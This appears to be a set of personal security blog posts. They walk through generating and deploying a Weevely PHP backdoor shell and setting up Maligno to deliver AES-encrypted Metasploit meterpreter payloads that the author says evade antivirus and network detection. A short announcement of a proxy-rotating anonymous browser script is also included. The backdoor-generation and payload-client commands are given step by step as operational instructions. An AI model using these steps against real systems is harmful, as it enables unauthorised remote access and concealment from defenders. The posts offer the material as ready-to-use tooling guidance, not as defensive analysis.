by Cornel on 27/02/2015
Recently I’ve been finding the need more and more to have a reliable backdoor PHP shell that has a reputable history. From work experience I knew about the classic c99.php backdoor shell and knew that it wasn’t the direction I wanted to go in. If you haven’t read The Hacker Blog article on it here, it’s definitely worth a read.
So I came across Weevely. What an awesome little backdoor! Here I’m just going to walk through the basic usage of it to get you up and running, definitely one of the easiest routes to go if you’re going to be uploading a backdoor anytime soon!
- Using Kali, Weevely is already built in, we can generate our backdoor with our password to connect to it. My password will be blagger.
weevely generate blagger sneaky.php
- Next, for simplicity sake, I will upload the backdoor to my test web server using SFTP. Of course there are hundreds of other ways to get your PHP script onto a web server, but this is a demo. Because my web server is ran on Amazon’s Ec2, I need to remote in using a limited user account. Still I can upload the file to the tmp directory to be moved by root.
- Finally, I’ll SSH in and move the uploaded backdoor into the public facing web directory to allow access for Weevely to connect. Once it’s publicly accessible, browse to it in Weevely and your back door gets executed!
weevely http://22.214.171.124/sneaky.php blagger
by Cornel on 2/07/2014
So I’ve decided I want to have my meterpreter sessions encrypted to avoid layer 4 detection. It’s something I’ve wanted in the past but never really pursued, until I came across Maligno. Maligno is a platform from which you can launch metasploit payloads via https that are AES encrypted and base64 encoded. The payload to be pushed to the client can also be be encoded numerous times via any Metasploit encoders to avoid layer 7 detection.
This is the process of setting up your server:
- Download and extract Maligno here: Maligno
- Install the prerequisite binaries:
sudo apt-get update && sudo apt-get install python-ipcalc
- Generate the self-signed SSL cert to be used on your server:
- Configure server.conf to allow the following:
- Serve 3 different payloads to 3 different targets all over port 443
- Serve via https
- Scope to your network
- Set the server IP to that of the Maligno host
- Generate the python scripts for the clients to reach out to Maligno with:
python clientgen.py -i 0 -f server.conf -o client1.py
python clientgen.py -i 1 -f server.conf -o client2.py
python clientgen.py -i 2 -f server.conf -o client3.py
- On a Windows machine, install python2.7, pycrypto and py2exe
- Generate executables from the python scripts using py2exe for all 3 target clients
- Start the Maligno server and the meterpreter handler to listen for incoming connections…
- Upon execution of your crafted executables, an encrypted meterpreter session will be opened undetected by antivirus or NIDS.
Enjoy responsibly. BYOB.
by Cornel on 22/01/2014
Fellow analysts, I give you my personal fully customized python-based anonymous browser, anonBrowser.py.
Nothing special, just a little terminal program that pulls a random proxy, emulates a random browser and pulls the specified content using it’s forged identity. Written so that it’s easy to understand and easy to customize should you like to make changes to it.
Usage: ./anonBrowser.py -s URL